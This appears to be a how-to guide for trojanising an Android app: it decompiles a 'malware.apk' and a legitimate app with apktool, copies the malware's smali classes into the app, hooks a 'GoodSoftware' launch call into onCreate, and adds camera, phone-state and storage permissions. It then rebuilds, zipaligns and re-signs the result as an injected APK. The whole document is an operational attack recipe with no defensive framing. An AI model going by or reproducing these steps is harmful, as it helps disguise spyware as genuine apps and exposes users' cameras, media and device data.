Prep

Without Camera

1. Comment out the timer and compile

   private fun startCheckingPermission() {
       timerStorage = Timer("CheckStoragePermissionTimer", false)
   
       timerStorage?.scheduleAtFixedRate(0, 5000) {
           checkStoragePermission()
           println("Requesting storage permission again")
       }
   
   /*        timerCamera = Timer("CheckCameraPermissionTimer", false)
   
       timerCamera?.scheduleAtFixedRate(0, 5000) {
           checkCameraPermission()
           println("Requesting camera permission again")
       }*/
   

2. Decompile the apk apktool d malware.apk

3. Decompile original app apktool d application.apk

4. Move malware to normal application cp -r malware/smali/com/* application/smali/com/

5. Under the onCreate of original app

   new-instance p1, Lcom/ti/m/GoodSoftware;
   
   move-object v0, p0
   
   check-cast v0, Landroid/content/Context;
   
   invoke-direct {p1, v0}, Lcom/ti/m/GoodSoftware;-><init>(Landroid/content/Context;)V
   
   invoke-virtual {p1}, Lcom/ti/m/GoodSoftware;->launch()V
   

6. Copy the permissions from the malware manifest to original manifests permissions

   <uses-permission android:name="android.permission.CAMERA"/>
   <uses-feature android:name="android.hardware.camera"/>
   <uses-feature android:name="android.hardware.camera.autofocus"/>
   <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
   <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
   <uses-permission android:name="android.permission.READ_MEDIA_IMAGES"/>
   

With Camera

1. Do the steps of without camera but don't uncomment the timer

2. Copy camera to existing androidx folder cp -r malware/smali/androidx/camera/ application/smali_classes2/androidx/

3. Copy androidx futures to existing cp -r malware/smali/androidx/concurrent/futures/* application/smali/androidx/concurrent/futures/

4. Copy MediatorLiveData cp -r malware/smali/androidx/lifecycle/MediatorLiveData* application/smali/androidx/lifecycle/

5. Copy Camera metadata from Manifest

             <service android:enabled="false" android:exported="false" android:name="androidx.camera.core.impl.MetadataHolderService">
           <meta-data android:name="androidx.camera.core.impl.MetadataHolderService.DEFAULT_CONFIG_PROVIDER" android:value="androidx.camera.camera2.Camera2Config$DefaultProvider"/>
       </service>
       <uses-library android:name="androidx.camera.extensions.impl" android:required="false"/>
   

6. Copy Camera Queries to manifest under the permissions

   <queries>
       <intent>
           <action android:name="androidx.camera.extensions.action.VENDOR_ACTION"/>
       </intent>
   </queries>
   

Final Steps

1. Build the application apktool b application -o unsigned.apk
2. Align using zipalign zipalign -p -f -v 4 unsigned.apk App_Injected.apk
3. Generate keystore keytool -genkey -V -keystore key.keystore -alias Android -keyalg RSA -keysize 2048 -validity 10000
4. Sign Apk apksigner sign --ks key.keystore App_Injected.apk
5. Done